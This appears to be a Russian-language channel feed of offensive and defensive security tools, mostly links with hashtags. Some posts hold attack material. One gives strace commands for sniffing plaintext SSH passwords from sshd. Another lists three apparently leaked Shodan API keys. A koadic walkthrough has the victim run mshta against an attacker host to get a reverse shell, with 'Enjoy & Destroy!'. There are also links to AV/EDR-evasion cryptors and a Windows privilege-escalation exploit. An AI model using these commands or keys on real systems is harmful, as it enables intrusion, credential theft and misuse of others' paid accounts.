🔥Снова инструменты для RedTeam

https://github.com/A-poc/RedTeam-Tools

#redteam #pentest #tools

🔥Blue-Team-Notes

https://github.com/Purp1eW0lf/Blue-Team-Notes

#notes #methodology #blueteam #forensic

Artfuscator
Лучший подход к психологической войне против reverse-инженеров.
Звучит конечно жирно,))
downLoad

Получаем пароль от SSH в открытом виде
*
1. получаем точный идентификатор sshd
pgrep -l sshd
2. Отслеживаем системные вызовы
strace -f -p <ssh_PID> -e trace=write -o capture


#ssh #sniff #password

🔥Инструмент для повышения привилегий по Win

For Windows 10 - 11 Windows Server 2012 - 2022

https://github.com/BeichenDream/PrintNotifyPotato

#LPE #win #patato #privesc

🔥Инструмент, который может попытаться найти IP, скрытый за CloudFlare

https://github.com/zidansec/CloudPeler
#osint #cloudflare #reverseproxy #ip #recon

EDR и антивирусы научились удалять системные файлы и драйверы

https://www.securitylab.ru/news/535225.php

🔥PE & Shellcode Cryptor

https://github.com/frkngksl/Shoggoth

#crypto #cryptor #evasion #bypass #av #edr #redteam

🔥Regex fuzzer

REcollapse is a helper tool for black-box regex fuzzing to bypass validations and discover normalizations in web applications

https://github.com/0xacb/recollapse

#regex #fuzz #fuzzer #tool #bypass #waf

Shodan API Keys ( paid plans ) 185

https://api.shodan.io/api-info?key={API}

cvMrPhi9VvUYe0HsD7dHKXAojghAjsmT - plus
TnzrcytxidVqp6Z38iH3xnmu77tjt6qm - dev
gAkg718JvQD1mtWze1vqrEH3l1gcHejp - dev

🔥NTLM scan

Сканит эндпоинт в поисках NTLM

https://github.com/nyxgeek/ntlmscan

#scan #ntlm #tool #privesc

#windows

Полезные тулзы во время пентеста Active Directory

Список самый простой, но интересный:

🔘 Impacket - набор для работы с сетевыми протоколами в инфраструктуре AD
🔘 Bloodhound - сбор информации об инфраструктуре AD
🔘 PowerSploit - модифицирует и подготавливает скрипты для выполнения кода на машине жертвы.
🔘 Neo4j - помогает структурировать данные
🔘 Mimikatz - позволяет просматривать и сохранять учетные данные
🔘 Evil-WinRM - WinRM Shell
🔘 Kerbrute - можно сделать User Enumeration
🔘 Responder - можно сделать SMB-Relay

🔥Небольшая шпаргалка по VT

#ti #threatint #vti #virustotal #cheatsheet

🔥List of plugins for IDA

https://github.com/vmallet/ida-plugins

#reverse #ida #plugin

🔥Writing a game trainer for game

#reverse #game #injector #trainer

🔥Remotely Control Any PC With koadic freamework!

https://www.youtube.com/watch?v=UImsfTpYjvU&ab_channel=LoiLiangYang

#c2 #postexploitation #reverseshell #lolbas #tools #pentest #redteam

kali$ git clone https://github.com/zerosum0x0/koadic.git

Run koadic

kali$ use stager/js/mshta

Fill stager option like in metasploit via SET

kali$ run

windows> mshta http://192.168.1.3:1234/BFIER

Wow! You've got a reverse shell!

kali$ zombies

kali$ cmdhell 0

Enjoy & Destroy!

#c2 #postexploitation #reverseshell #lolbas #tools #pentest #redteam

🔥Malpedia

Этот инструмент позволяет получить информацию о вредоносном ПО или об APT группировке, а также найти упоминания в различных источниках. Обычно в этих источниках публикуются IOC\IOA, которые могут помочь прокачать правила корреляции в SOC.

https://malpedia.caad.fkie.fraunhofer.de/

#feeds #ioc #ioa #apt #malware #soc